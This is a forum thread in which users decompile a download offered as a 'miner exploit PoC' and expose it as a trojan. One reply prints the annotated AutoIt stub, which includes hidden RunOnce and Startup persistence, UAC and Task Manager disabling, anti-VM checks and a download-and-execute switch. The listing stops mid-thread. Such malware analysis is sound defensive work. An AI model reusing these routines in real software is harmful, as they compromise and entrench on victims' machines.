steve15 (OP)
January 27, 2014, 01:54:14 PM |
>> The security built in cannot be bypassed.
> I lol'ed... Your exe is actually an SFX RAR containing, among others, two other exes: your AutoIt "protection"(?) and your .NET exe, which can be fully decompiled with dotPeek or ILSpy! For a pentesting expert, you could have done a better job!

Feel free to decompile it, and PM me the results. We'll compare the source with your results then ;-)
nuno12345
January 27, 2014, 07:10:52 PM |
frmUPnPBrowser: Source Code for [KnC_cg_bfg_exploit_PoC]ManagedUPnPTest.frmUPnPBrowser // Decompiled by Salamander version 2.0.0 // Copyright 2002-2006 Remotesoft Inc. All rights reserved. // http://www.remotesoft.com/salamander
using ManagedUPnP; using System; using System.ComponentModel; using System.Drawing; using System.Windows.Forms;
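namespace ManagedUPnPTest
{
    /// <summary>
    /// Main window of the UPnP browser: runs UPnP discovery on the local
    /// network, lists the devices/services found in a tree, and shows an
    /// info panel for the selected item plus the library's log output.
    ///
    /// This listing was recovered with the Salamander decompiler. Its output
    /// was not valid C# (two-argument delegate constructors, integer
    /// <c>case</c> labels on an enum, an <c>int</c> used as a <c>bool</c> in
    /// <see cref="Dispose(bool)"/>); those artifacts are rewritten here,
    /// behaviour is unchanged.
    ///
    /// Review note: nothing in this class does more than discovery and
    /// display. The only call with a host-side effect is
    /// <c>WindowsFirewall.CheckUPnPFirewallRules(null)</c> in the Load
    /// handler, whose body lives in the ManagedUPnP library and is not in
    /// this listing. The <c>ManagedUPnPTest</c> namespace and the
    /// <c>frmManagedUPnPTest_Load</c> handler name suggest this is the
    /// library's sample browser with only the window title changed (see
    /// <see cref="InitializeComponent"/>); confirm against the library source.
    /// </summary>
    public class frmUPnPBrowser : Form
    {
        // Discovery engine; raises add/remove notifications consumed below.
        private ManagedUPnP.AutoEventedDiscoveryServices mdsServices;

        // Info control currently docked in pnlInfo for the selected tree item.
        private ctlUPnPInfo miInfo = null;

        private IContainer components = null;
        private ctlUPnPTreeBrowser tvUPnP;
        // Created by the designer code but not attached to any control here.
        private ImageList ilIcons;
        private Panel pnlInfo;
        private SplitContainer scMain;
        private TabControl tcMain;
        private TabPage tpInfo;
        private TabPage tpLog;
        private ctlLogBox txtLog;

        public frmUPnPBrowser()
        {
            InitializeComponent();
        }

        /// <summary>
        /// Form Load: routes the library logger into the log box, wires the
        /// discovery callbacks, checks firewall rules and starts discovery
        /// asynchronously.
        /// </summary>
        private void frmManagedUPnPTest_Load(object sender, EventArgs e)
        {
            Logging.LogLines += Logging_LogLines;
            Logging.Enabled = true;

            mdsServices = new ManagedUPnP.AutoEventedDiscoveryServices(null);
            // Also resolve which local interface each device was seen on.
            mdsServices.ResolveNetworkInterfaces = true;
            mdsServices.CanCreateServiceFor += dsServices_CanCreateServiceFor;
            mdsServices.CreateServiceFor += dsServices_CreateServiceFor;
            mdsServices.StatusNotifyAction += dsServices_StatusNotifyAction;

            // Library call; presumably makes sure the SSDP/UPnP firewall
            // rules exist. Its implementation is not in this listing, so
            // what it changes on the host has to be checked in ManagedUPnP.
            WindowsFirewall.CheckUPnPFirewallRules(null);

            mdsServices.ReStartAsync();
        }

        /// <summary>Form close: detach from the static logger.</summary>
        private void frmUPnPBrowser_FormClosing(object sender, FormClosingEventArgs e)
        {
            Logging.Enabled = false;
            Logging.LogLines -= Logging_LogLines;
        }

        /// <summary>
        /// Appends library log output to the log box, prefixing every line
        /// with a local timestamp and four spaces per indent level.
        /// </summary>
        private void Logging_LogLines(object sender, LogLinesEventArgs a)
        {
            string prefix = DateTime.Now.ToString("[yyyy/MM/dd HH:mm:ss.fff] ") + new string(' ', a.Indent * 4);
            txtLog.AppendLog(prefix + a.Lines.Replace("\r\n", "\r\n" + prefix) + "\r\n");
        }

        /// <summary>
        /// Keeps the tree in sync with discovery notifications. The enum
        /// member names were not recovered by the decompiler, so the numeric
        /// values are kept and described by what each branch does.
        /// (<c>…B1</c> in the parameter type is presumably the decompiler's
        /// rendering of a generic type's <c>`1</c> suffix.)
        /// </summary>
        private void dsServices_StatusNotifyAction(object sender, AutoEventedDiscoveryServicesB1.StatusNotifyActionEventArgs a)
        {
            switch ((int)a.NotifyAction)
            {
                case 1:   // device removed; Data is a string naming the device
                    tvUPnP.RemoveDevice((string)a.Data);
                    break;
                case 2:   // service removed
                    tvUPnP.RemoveService((Service)a.Data);
                    break;
                case 10:  // service found
                    tvUPnP.AddService((Service)a.Data);
                    break;
            }
        }

        /// <summary>Use the discovered service object as-is for auto-services.</summary>
        private void dsServices_CreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CreateServiceForEventArgs a)
        {
            a.CreatedAutoService = a.Service;
        }

        /// <summary>Accept every discovered service; nothing is filtered.</summary>
        private void dsServices_CanCreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CanCreateServiceForEventArgs a)
        {
            a.CanCreate = true;
        }

        /// <summary>
        /// Swaps the info panel to the newly selected item's control. The
        /// previous control is removed and disposed in <c>finally</c> so it is
        /// released even if obtaining or docking the new one throws.
        /// </summary>
        private void tvUPnP_AfterSelect(object sender, TreeViewEventArgs e)
        {
            IUPnPTreeItem selected = tvUPnP.SelectedItem;
            ctlUPnPInfo previous = miInfo;
            miInfo = null;
            try
            {
                if (selected != null)
                {
                    miInfo = selected.InfoControl;
                    if (miInfo != null)
                    {
                        miInfo.Dock = DockStyle.Fill;
                        pnlInfo.Controls.Add(miInfo);
                    }
                }
            }
            finally
            {
                if (previous != null)
                {
                    pnlInfo.Controls.Remove(previous);
                    previous.Dispose();
                }
            }
        }

        /// <summary>
        /// Standard designer Dispose. The decompiled
        /// <c>!(disposing ? (components == null) : 1)</c> reduces to
        /// <c>disposing &amp;&amp; components != null</c>.
        /// </summary>
        protected override void Dispose(bool disposing)
        {
            if (disposing && components != null)
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        /// <summary>
        /// Designer-generated layout: a split container with the device tree
        /// on the left and an Info/Log tab control on the right. The window
        /// title is the only text here that mentions miners or exploits.
        /// </summary>
        private void InitializeComponent()
        {
            components = new Container();
            ilIcons = new ImageList(components);
            pnlInfo = new Panel();
            scMain = new SplitContainer();
            tcMain = new TabControl();
            tpInfo = new TabPage();
            tpLog = new TabPage();
            tvUPnP = new ctlUPnPTreeBrowser();
            txtLog = new ctlLogBox();
            ((ISupportInitialize)scMain).BeginInit();
            scMain.Panel1.SuspendLayout();
            scMain.Panel2.SuspendLayout();
            scMain.SuspendLayout();
            tcMain.SuspendLayout();
            tpInfo.SuspendLayout();
            tpLog.SuspendLayout();
            base.SuspendLayout();
            //
            // ilIcons
            //
            ilIcons.ColorDepth = ColorDepth.Depth8Bit;
            ilIcons.ImageSize = new Size(16, 16);
            ilIcons.TransparentColor = Color.Transparent;
            //
            // pnlInfo
            //
            pnlInfo.Dock = DockStyle.Fill;
            pnlInfo.Location = new Point(3, 3);
            pnlInfo.Name = "pnlInfo";
            pnlInfo.Size = new Size(645, 646);
            pnlInfo.TabIndex = 1;
            //
            // scMain
            //
            scMain.Dock = DockStyle.Fill;
            scMain.Location = new Point(0, 0);
            scMain.Name = "scMain";
            scMain.Panel1.Controls.Add(tvUPnP);
            scMain.Panel2.Controls.Add(tcMain);
            scMain.Size = new Size(1055, 678);
            scMain.SplitterDistance = 392;
            scMain.TabIndex = 2;
            //
            // tcMain
            //
            tcMain.Controls.Add(tpInfo);
            tcMain.Controls.Add(tpLog);
            tcMain.Dock = DockStyle.Fill;
            tcMain.Location = new Point(0, 0);
            tcMain.Name = "tcMain";
            tcMain.SelectedIndex = 0;
            tcMain.Size = new Size(659, 678);
            tcMain.TabIndex = 1;
            //
            // tpInfo
            //
            tpInfo.Controls.Add(pnlInfo);
            tpInfo.Location = new Point(4, 22);
            tpInfo.Name = "tpInfo";
            tpInfo.Padding = new Padding(3);
            tpInfo.Size = new Size(651, 652);
            tpInfo.TabIndex = 0;
            tpInfo.Text = "Selected Item Info";
            tpInfo.UseVisualStyleBackColor = true;
            //
            // tpLog
            //
            tpLog.Controls.Add(txtLog);
            tpLog.Location = new Point(4, 22);
            tpLog.Name = "tpLog";
            tpLog.Padding = new Padding(3);
            tpLog.Size = new Size(496, 502);
            tpLog.TabIndex = 1;
            tpLog.Text = "UPnP Log";
            tpLog.UseVisualStyleBackColor = true;
            //
            // tvUPnP
            //
            tvUPnP.Dock = DockStyle.Fill;
            tvUPnP.ImageIndex = 1;
            tvUPnP.Location = new Point(0, 0);
            tvUPnP.Name = "tvUPnP";
            tvUPnP.SelectedImageIndex = 0;
            tvUPnP.Size = new Size(392, 678);
            tvUPnP.TabIndex = 0;
            tvUPnP.AfterSelect += new TreeViewEventHandler(this.tvUPnP_AfterSelect);
            //
            // txtLog
            //
            txtLog.BackColor = SystemColors.Window;
            txtLog.Dock = DockStyle.Fill;
            txtLog.Font = new Font("Courier New", 8.25F);
            txtLog.Location = new Point(3, 3);
            txtLog.Name = "txtLog";
            txtLog.ReadOnly = true;
            txtLog.Size = new Size(490, 496);
            txtLog.TabIndex = 0;
            txtLog.Text = "";
            txtLog.WordWrap = false;
            //
            // frmUPnPBrowser
            //
            base.AutoScaleDimensions = new SizeF(6.0F, 13.0F);
            base.AutoScaleMode = AutoScaleMode.Font;
            base.ClientSize = new Size(1055, 678);
            base.Controls.Add(scMain);
            base.Name = "frmUPnPBrowser";
            // The only "exploit"-related string in the whole class.
            Text = "KnC Miner - CGminer - BFGminer exploiter PoC";
            base.FormClosing += new FormClosingEventHandler(this.frmUPnPBrowser_FormClosing);
            base.Load += new EventHandler(this.frmManagedUPnPTest_Load);
            scMain.Panel1.ResumeLayout(false);
            scMain.Panel2.ResumeLayout(false);
            ((ISupportInitialize)scMain).EndInit();
            scMain.ResumeLayout(false);
            tcMain.ResumeLayout(false);
            tpInfo.ResumeLayout(false);
            tpLog.ResumeLayout(false);
            base.ResumeLayout(false);
        }
    }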
}

Am I right? Should I paste what it does?
steve15 (OP)
January 27, 2014, 07:26:24 PM |
frmUPnPBrowser: Source Code for [KnC_cg_bfg_exploit_PoC]ManagedUPnPTest.frmUPnPBrowser // Decompiled by Salamander version 2.0.0 // Copyright 2002-2006 Remotesoft Inc. All rights reserved. // http://www.remotesoft.com/salamander
using ManagedUPnP; using System; using System.ComponentModel; using System.Drawing; using System.Windows.Forms;
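namespace ManagedUPnPTest
{
    /// <summary>
    /// Main window of the UPnP browser: runs UPnP discovery on the local
    /// network, lists the devices/services found in a tree, and shows an
    /// info panel for the selected item plus the library's log output.
    ///
    /// This listing was recovered with the Salamander decompiler. Its output
    /// was not valid C# (two-argument delegate constructors, integer
    /// <c>case</c> labels on an enum, an <c>int</c> used as a <c>bool</c> in
    /// <see cref="Dispose(bool)"/>); those artifacts are rewritten here,
    /// behaviour is unchanged.
    ///
    /// Review note: nothing in this class does more than discovery and
    /// display. The only call with a host-side effect is
    /// <c>WindowsFirewall.CheckUPnPFirewallRules(null)</c> in the Load
    /// handler, whose body lives in the ManagedUPnP library and is not in
    /// this listing. The <c>ManagedUPnPTest</c> namespace and the
    /// <c>frmManagedUPnPTest_Load</c> handler name suggest this is the
    /// library's sample browser with only the window title changed (see
    /// <see cref="InitializeComponent"/>); confirm against the library source.
    /// </summary>
    public class frmUPnPBrowser : Form
    {
        // Discovery engine; raises add/remove notifications consumed below.
        private ManagedUPnP.AutoEventedDiscoveryServices mdsServices;

        // Info control currently docked in pnlInfo for the selected tree item.
        private ctlUPnPInfo miInfo = null;

        private IContainer components = null;
        private ctlUPnPTreeBrowser tvUPnP;
        // Created by the designer code but not attached to any control here.
        private ImageList ilIcons;
        private Panel pnlInfo;
        private SplitContainer scMain;
        private TabControl tcMain;
        private TabPage tpInfo;
        private TabPage tpLog;
        private ctlLogBox txtLog;

        public frmUPnPBrowser()
        {
            InitializeComponent();
        }

        /// <summary>
        /// Form Load: routes the library logger into the log box, wires the
        /// discovery callbacks, checks firewall rules and starts discovery
        /// asynchronously.
        /// </summary>
        private void frmManagedUPnPTest_Load(object sender, EventArgs e)
        {
            Logging.LogLines += Logging_LogLines;
            Logging.Enabled = true;

            mdsServices = new ManagedUPnP.AutoEventedDiscoveryServices(null);
            // Also resolve which local interface each device was seen on.
            mdsServices.ResolveNetworkInterfaces = true;
            mdsServices.CanCreateServiceFor += dsServices_CanCreateServiceFor;
            mdsServices.CreateServiceFor += dsServices_CreateServiceFor;
            mdsServices.StatusNotifyAction += dsServices_StatusNotifyAction;

            // Library call; presumably makes sure the SSDP/UPnP firewall
            // rules exist. Its implementation is not in this listing, so
            // what it changes on the host has to be checked in ManagedUPnP.
            WindowsFirewall.CheckUPnPFirewallRules(null);

            mdsServices.ReStartAsync();
        }

        /// <summary>Form close: detach from the static logger.</summary>
        private void frmUPnPBrowser_FormClosing(object sender, FormClosingEventArgs e)
        {
            Logging.Enabled = false;
            Logging.LogLines -= Logging_LogLines;
        }

        /// <summary>
        /// Appends library log output to the log box, prefixing every line
        /// with a local timestamp and four spaces per indent level.
        /// </summary>
        private void Logging_LogLines(object sender, LogLinesEventArgs a)
        {
            string prefix = DateTime.Now.ToString("[yyyy/MM/dd HH:mm:ss.fff] ") + new string(' ', a.Indent * 4);
            txtLog.AppendLog(prefix + a.Lines.Replace("\r\n", "\r\n" + prefix) + "\r\n");
        }

        /// <summary>
        /// Keeps the tree in sync with discovery notifications. The enum
        /// member names were not recovered by the decompiler, so the numeric
        /// values are kept and described by what each branch does.
        /// (<c>…B1</c> in the parameter type is presumably the decompiler's
        /// rendering of a generic type's <c>`1</c> suffix.)
        /// </summary>
        private void dsServices_StatusNotifyAction(object sender, AutoEventedDiscoveryServicesB1.StatusNotifyActionEventArgs a)
        {
            switch ((int)a.NotifyAction)
            {
                case 1:   // device removed; Data is a string naming the device
                    tvUPnP.RemoveDevice((string)a.Data);
                    break;
                case 2:   // service removed
                    tvUPnP.RemoveService((Service)a.Data);
                    break;
                case 10:  // service found
                    tvUPnP.AddService((Service)a.Data);
                    break;
            }
        }

        /// <summary>Use the discovered service object as-is for auto-services.</summary>
        private void dsServices_CreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CreateServiceForEventArgs a)
        {
            a.CreatedAutoService = a.Service;
        }

        /// <summary>Accept every discovered service; nothing is filtered.</summary>
        private void dsServices_CanCreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CanCreateServiceForEventArgs a)
        {
            a.CanCreate = true;
        }

        /// <summary>
        /// Swaps the info panel to the newly selected item's control. The
        /// previous control is removed and disposed in <c>finally</c> so it is
        /// released even if obtaining or docking the new one throws.
        /// </summary>
        private void tvUPnP_AfterSelect(object sender, TreeViewEventArgs e)
        {
            IUPnPTreeItem selected = tvUPnP.SelectedItem;
            ctlUPnPInfo previous = miInfo;
            miInfo = null;
            try
            {
                if (selected != null)
                {
                    miInfo = selected.InfoControl;
                    if (miInfo != null)
                    {
                        miInfo.Dock = DockStyle.Fill;
                        pnlInfo.Controls.Add(miInfo);
                    }
                }
            }
            finally
            {
                if (previous != null)
                {
                    pnlInfo.Controls.Remove(previous);
                    previous.Dispose();
                }
            }
        }

        /// <summary>
        /// Standard designer Dispose. The decompiled
        /// <c>!(disposing ? (components == null) : 1)</c> reduces to
        /// <c>disposing &amp;&amp; components != null</c>.
        /// </summary>
        protected override void Dispose(bool disposing)
        {
            if (disposing && components != null)
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        /// <summary>
        /// Designer-generated layout: a split container with the device tree
        /// on the left and an Info/Log tab control on the right. The window
        /// title is the only text here that mentions miners or exploits.
        /// </summary>
        private void InitializeComponent()
        {
            components = new Container();
            ilIcons = new ImageList(components);
            pnlInfo = new Panel();
            scMain = new SplitContainer();
            tcMain = new TabControl();
            tpInfo = new TabPage();
            tpLog = new TabPage();
            tvUPnP = new ctlUPnPTreeBrowser();
            txtLog = new ctlLogBox();
            ((ISupportInitialize)scMain).BeginInit();
            scMain.Panel1.SuspendLayout();
            scMain.Panel2.SuspendLayout();
            scMain.SuspendLayout();
            tcMain.SuspendLayout();
            tpInfo.SuspendLayout();
            tpLog.SuspendLayout();
            base.SuspendLayout();
            //
            // ilIcons
            //
            ilIcons.ColorDepth = ColorDepth.Depth8Bit;
            ilIcons.ImageSize = new Size(16, 16);
            ilIcons.TransparentColor = Color.Transparent;
            //
            // pnlInfo
            //
            pnlInfo.Dock = DockStyle.Fill;
            pnlInfo.Location = new Point(3, 3);
            pnlInfo.Name = "pnlInfo";
            pnlInfo.Size = new Size(645, 646);
            pnlInfo.TabIndex = 1;
            //
            // scMain
            //
            scMain.Dock = DockStyle.Fill;
            scMain.Location = new Point(0, 0);
            scMain.Name = "scMain";
            scMain.Panel1.Controls.Add(tvUPnP);
            scMain.Panel2.Controls.Add(tcMain);
            scMain.Size = new Size(1055, 678);
            scMain.SplitterDistance = 392;
            scMain.TabIndex = 2;
            //
            // tcMain
            //
            tcMain.Controls.Add(tpInfo);
            tcMain.Controls.Add(tpLog);
            tcMain.Dock = DockStyle.Fill;
            tcMain.Location = new Point(0, 0);
            tcMain.Name = "tcMain";
            tcMain.SelectedIndex = 0;
            tcMain.Size = new Size(659, 678);
            tcMain.TabIndex = 1;
            //
            // tpInfo
            //
            tpInfo.Controls.Add(pnlInfo);
            tpInfo.Location = new Point(4, 22);
            tpInfo.Name = "tpInfo";
            tpInfo.Padding = new Padding(3);
            tpInfo.Size = new Size(651, 652);
            tpInfo.TabIndex = 0;
            tpInfo.Text = "Selected Item Info";
            tpInfo.UseVisualStyleBackColor = true;
            //
            // tpLog
            //
            tpLog.Controls.Add(txtLog);
            tpLog.Location = new Point(4, 22);
            tpLog.Name = "tpLog";
            tpLog.Padding = new Padding(3);
            tpLog.Size = new Size(496, 502);
            tpLog.TabIndex = 1;
            tpLog.Text = "UPnP Log";
            tpLog.UseVisualStyleBackColor = true;
            //
            // tvUPnP
            //
            tvUPnP.Dock = DockStyle.Fill;
            tvUPnP.ImageIndex = 1;
            tvUPnP.Location = new Point(0, 0);
            tvUPnP.Name = "tvUPnP";
            tvUPnP.SelectedImageIndex = 0;
            tvUPnP.Size = new Size(392, 678);
            tvUPnP.TabIndex = 0;
            tvUPnP.AfterSelect += new TreeViewEventHandler(this.tvUPnP_AfterSelect);
            //
            // txtLog
            //
            txtLog.BackColor = SystemColors.Window;
            txtLog.Dock = DockStyle.Fill;
            txtLog.Font = new Font("Courier New", 8.25F);
            txtLog.Location = new Point(3, 3);
            txtLog.Name = "txtLog";
            txtLog.ReadOnly = true;
            txtLog.Size = new Size(490, 496);
            txtLog.TabIndex = 0;
            txtLog.Text = "";
            txtLog.WordWrap = false;
            //
            // frmUPnPBrowser
            //
            base.AutoScaleDimensions = new SizeF(6.0F, 13.0F);
            base.AutoScaleMode = AutoScaleMode.Font;
            base.ClientSize = new Size(1055, 678);
            base.Controls.Add(scMain);
            base.Name = "frmUPnPBrowser";
            // The only "exploit"-related string in the whole class.
            Text = "KnC Miner - CGminer - BFGminer exploiter PoC";
            base.FormClosing += new FormClosingEventHandler(this.frmUPnPBrowser_FormClosing);
            base.Load += new EventHandler(this.frmManagedUPnPTest_Load);
            scMain.Panel1.ResumeLayout(false);
            scMain.Panel2.ResumeLayout(false);
            ((ISupportInitialize)scMain).EndInit();
            scMain.ResumeLayout(false);
            tcMain.ResumeLayout(false);
            tpInfo.ResumeLayout(false);
            tpLog.ResumeLayout(false);
            base.ResumeLayout(false);
        }
    }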
}

> Am I right? Should I paste what it does?

So you can decompile a standard .NET form... Congrats! Now show me the code that actually gets executed — that's what this is about, right? Why on earth should I encrypt a standard form that does nothing but display some results? I can also just give you the manifest XML file, instead of you acting like a fool who can decompile a standard WinForm.
steve15 (OP)
January 27, 2014, 07:43:14 PM |
Alright, to keep this post on topic.
JUST TO BE CLEAR
Decompiling the executable or the DLL file will NOT give you what you are looking for. Those only run the network scan.
AutoIt is used to execute the actual exploit and to detect modifications, scanners, sniffers, decompilers and virtual machines.
If ANY of these is detected, the application shuts down and the REAL injection script is terminated, destroyed and melted.
USE THIS TOOL FOR WHAT IT HAS BEEN DESIGNED FOR!!
This tool is a PROOF OF CONCEPT of built-in exploits in most miner hardware rigs.
If you feel the need to run it sandboxed, in a VM, or with an active scanner/sniffer/decompiler/debugger, then your intention is NOT to test your own environment, so the file gets destroyed.
I received a ton of PMs about security issues, and this is the best solution to prevent idiots from trying to hack someone else's miners.
Over and out.
ici_lemmy
January 27, 2014, 11:32:08 PM Last edit: January 27, 2014, 11:48:08 PM by ici_lemmy |
That was smart to let us look at the other way... I'm disapointed by meself, I should have seen that earlier...

; ---- Decompiled AutoIt stub: entry point ------------------------------------
; Main body of the AutoIt script packed inside the OP's download. Every
; feature below is gated on an INI file (HbDzt.MCM) that sits next to the
; script: a function is called only when a given section/key holds a magic
; value. That INI is NOT shown anywhere in this thread, so which of these
; features actually fire in the OP's build cannot be determined from the
; script alone. Lines are re-wrapped for readability; the code is unchanged.

#NoTrayIcon

; If the Avast UI is running, stall 20 s before doing anything
; (presumably to wait out behavioural scanning).
If ProcessExists("avastui.exe") Then Sleep(20000)

; Name of the hidden working directory under %userprofile% and of the
; RunOnce value written by startup().
$path = "ppqzt"

; 8.3 short paths, so later file/registry writes survive non-ASCII profiles.
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"

; Mark the script's own directory system+hidden+read-only.
FileSetAttrib($uniscriptdir, "+SHR")

; --- feature switches read from HbDzt.MCM --------------------------------
; Sandbox stall (see delay()).
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
    delay()
Else
EndIf
; Single-instance check by process name (see mutex()).
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
    mutex()
Else
EndIf
; Persistence via Startup shortcut / RunOnce + dropped .cmd/.vbs (see startup()).
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
    startup()
Else
EndIf
; Anti-VM / anti-analysis exit (see antis()).
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
    antis()
Else
EndIf
; The remaining switches still use the crypter's un-obfuscated placeholder
; section/key names ("fake1", "botkiller1", ...).
; Decoy message box.
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
    fakemessage()
Else
EndIf
; Wipe other autostart entries.
Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
    botkiller()
Else
EndIf
; Download-and-execute.
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
    downloader()
Else
EndIf
; Turn UAC off (HKLM write).
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
    disable_uac()
Else
EndIf
; Remove the System Protection client registration.
Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
    disable_syste_restore()
Else
EndIf
; Disable Task Manager for the current user.
Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
    antitask()
Else
EndIf
; Stalls about 30 s (6 x 5 s). Each round launches mshta.exe and then kills it
; through a hidden cmd; the likely intent is to outlast sandbox time limits
; while producing activity that looks like normal shell use.
Func delay()
    $counter = 0
    While $counter <= 5
        Sleep(5000)
        ShellExecute(@SystemDir & "\mshta.exe")
        $counter = $counter + 1
        _rundos("taskkill /IM mshta.exe")
    WEnd
EndFunc
; Removes Explorer's "Folder Options" menu and turns off display of
; super-hidden (system) files, so the +SH files dropped by startup() stay
; invisible to the user. Not called from the visible entry code.
Func systemhide()
    RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
    RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc
; Shows a decoy message box whose icon/title/text come from the INI, once:
; a check.txt marker in %userprofile%\ppqzt suppresses it on later runs.
Func fakemessage()
    $type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound")
    $title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound")
    $message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound")
    If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
    Else
        MsgBox($type, $title, $message)
        FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
    EndIf
EndFunc
; "Mutex" by process count: exits if another lmsqQw.exe is already running.
; ProcessList() returns the count in element [0][0], so UBound > 2 means two
; or more instances. lmsqQw.exe is the executable startup() relaunches with
; the script as argument (presumably a renamed AutoIt interpreter).
; Note: $scriptname is assigned here and also read by loop().
Func mutex()
    $scriptname = "lmsqQw.exe"
    If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc
; Blocks Task Manager for the current user (DisableTaskMgr=1 under HKCU
; policies) unless it is already set.
Func antitask()
    $read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
    If NOT ($read_antitask = "1") Then
        RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
    EndIf
EndFunc
; Turns UAC off system-wide (EnableLUA=0). This is an HKLM write, so it only
; succeeds when the stub is already running elevated.
Func disable_uac()
    $read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
    If NOT ($read_uac = "0") Then
        RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
    EndIf
EndFunc
; Persistence. Registers %userprofile%\ppqzt\85841.vbs as a RunOnce value and,
; when UAC elevation is enabled, also as a hidden Startup-folder shortcut.
; On first run it drops two files: 65084.cmd, which cd's into the hidden
; directory and starts lmsqQw.exe with this script's name as argument, and
; 85841.vbs, which runs that .cmd through WScript.Shell with a hidden window.
; Both are marked system+hidden+read-only. (FileOpen mode 1 = append.)
Func startup()
    $buac = _checkelevationenabled()
    If $buac = 0 Then
    Else
        FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk")
        FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
    EndIf
    RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
    If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then
        ; .cmd launcher: relaunch the interpreter against this script.
        Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1)
        $autoit3 = "lmsqQw.exe"
        FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
        FileClose($bat)
        ; .vbs wrapper: run the .cmd with a hidden window.
        Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1)
        FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
        FileClose($vbs)
        RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
        FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR")
        FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR")
        ; The Startup shortcut created above is removed again on first run.
        If FileExists($unicode_startup & "\start.lnk") Then
            FileDelete($unicode_startup & "\start.lnk")
        EndIf
    Else
    EndIf
EndFunc
; Returns the BOOL from kernel32!CheckElevationEnabled (UAC elevation on/off)
; with @error set to the call's return value. Returns early with nothing if
; the EnableLUA registry read fails.
Func _checkelevationenabled()
    $read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
    If @error Then Return
    Local $struct = DllStructCreate("BOOL")
    Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
    If @error Then
        Return SetError(@error)
    EndIf
    Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc
; Anti-analysis: exits if the desktop ("Program Manager") window text reads
; "0" (intent unclear; presumably a sandbox heuristic) or if a VirtualBox or
; VMware guest-tools process is running. This is the whole of the
; "anti-virtual" logic; nothing in the visible script detects sniffers,
; decompilers or debuggers (the snipped region is not shown).
Func antis()
    If WinGetText("Program Manager") = "0" Then
        Exit
    Else
    EndIf
    If ProcessExists("VboxService.exe") Then
        Exit
    EndIf
    If ProcessExists("VMwaretray.exe") Then
        Exit
    EndIf
EndFunc
; If none of six well-known signed host processes is running, launches
; run.vbs from the script directory and exits. run.vbs is not shown; the
; process list reads like the hosts a RunPE-style injector would use, so
; this presumably re-launches the payload inside one of them - verify.
; Not called from the visible entry code.
Func persistence()
